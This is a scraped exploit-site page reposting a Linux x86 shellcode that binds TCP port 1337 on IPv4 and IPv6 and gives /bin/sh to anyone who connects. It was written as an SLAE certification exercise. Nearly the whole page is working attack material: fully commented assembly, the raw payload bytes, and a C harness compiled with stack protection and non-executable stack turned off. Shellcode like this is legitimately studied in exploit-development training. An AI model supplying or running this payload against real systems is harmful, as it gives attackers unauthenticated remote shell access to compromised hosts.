Registerlinuxx86 bind (1337tcp) shell (binsh) + (dual ipv4 and ipv6) shellcode (146 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & linux_x86 vulnerability
Online Vulnerability Scanner Tools
Code...
/* # Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode # Date: 2018-08-18 # Shellcode Author: Kevin Kirsche # Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell # Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2 # This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE-1134 Compilation instructions: gcc -o shellcode shellcode.c -fno-stack-protector -z execstack Commented NASM: global _start section .text _start: ; socket ;; cleanup xor ebx, ebx ;; arguments push ebx ; #define IP_PROTO 0 push 0x1 ; #define SOCK_STREAM 1 push 0xa ; #define PF_INET6 10 ;; function mov ecx, esp ; pointer to args on the stack into ecx push 0x66 pop eax ; socketcall 0x66 == 102 inc ebx ; #define SYS_SOCKET 1 ;; call int 0x80 ;; returned data xchg esi, eax ; sockfd eax -> esi ; setsocketopt ;; cleanup xor eax, eax ;; arguments push eax ; NO = 0x0 mov edx, esp ; get a pointer to the null value push 0x2 ; sizeof(NO) push edx ; pointer to NO push 0x1a ; #define IPV6_V6ONLY 26 push 0x29 ; #define IPPROTO_IPV6 ;; function mov ecx, esp ; pointer to args on the stack into ecx mov al, 0x66 ; socketcall 0x66 == 102 mov bl, 0xe ; #define SYS_SETSOCKOPT 14 ;; call int 0x80 ; bind ipv4 ;; cleanup xor edx, edx ;; v4lhost struct push edx ; #define INADDR_ANY 0 push word 0x3905 ; port 1337 in big endian format push 0x2 ; #define AF_INET 2 ;; arguments mov ecx, esp ; pointer to v4lhost struct arguments push 0x10 ; sizeof v4lhost push ecx ; pointer v4lhost push esi ; push sockfd onto stack ;; function mov ecx, esp ; argument pointer into ecx mov bl, 0x2 ; #define SYS_BIND 2 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ; bind ipv6 ;; cleanup xor eax, eax ;; v6lhost struct push dword eax ; v6_host.sin6_addr push dword eax push dword eax push dword eax push dword eax push word 0x3905 ; port 1337 push word 0x0a ; PF_INET6 ;; arguments mov ecx, esp ; pointer to struct into ecx push 0x1c ; sizeof struct push ecx ; pointer to struct push esi ; sockfd ;; function mov ecx, esp ; arguments into register mov bl, 0x2 ; #define SYS_BIND 2 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ; listen ;; arguments push byte 0x2 ; queuelimit = 2 push esi ; sockfd ;; function mov ecx, esp ; pointer to args into ecx mov bl, 0x4 ; #define SYS_LISTEN 4 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ; accept ;; cleanup xor ebx, ebx ;;arguments push ebx ; push NULL push ebx ; push NULL push esi ; sockfd ;; function mov ecx, esp ; pointer to args into ecx mov bl, 0x5 ; #define SYS_ACCEPT 5 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ;; returned data xchg ebx, eax ; ebx holds the new sockfd that we accepted ; dup file descriptor ;; setup counters sub ecx, ecx ; zero out ecx mov cl, 0x2 ; create a counter ;; loop duploop: mov al, 0x3f ; SYS_DUP2 syscall int 0x80 ; call SYS_DUP2 dec ecx ; decrement loop counter jns duploop ; as long as SF is not set, keep looping ; execve ;; cleanup xor edx, edx ;; command to run push edx ; NULL string terminator push 0x68732f2f ; hs// push 0x6e69622f ; nib/ ;; arguments mov ebx, esp ; pointer to args into ebx push edx ; null ARGV push ebx ; command to run ;; function mov ecx, esp mov al, 0x0b ; execve systemcall int 0x80 */ #include <stdio.h> #include <string.h> unsigned char code[] = "\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43" "\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0" "\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10" "\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66" "\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66" "\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56" "\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49" "\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" "\x53\x89\xe1\xb0\x0b\xcd\x80"; int main() { // pollute the registers asm("mov $0x78975432, %eax\n\t" "mov $0x17645589, %ecx\n\t" "mov $0x23149875, %edx\n\t"); // begin shellcode printf("Shellcode Length: %d\n", strlen(code)); // execute our shellcode int (*ret)() = (int(*)())code; ret(); }
Linuxx86 bind (1337tcp) shell (binsh) + (dual ipv4 and ipv6) shellcode (146 bytes) Vulnerability / Exploit Source : Linuxx86 bind (1337tcp) shell (binsh) + (dual ipv4 and ipv6) shellcode (146 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes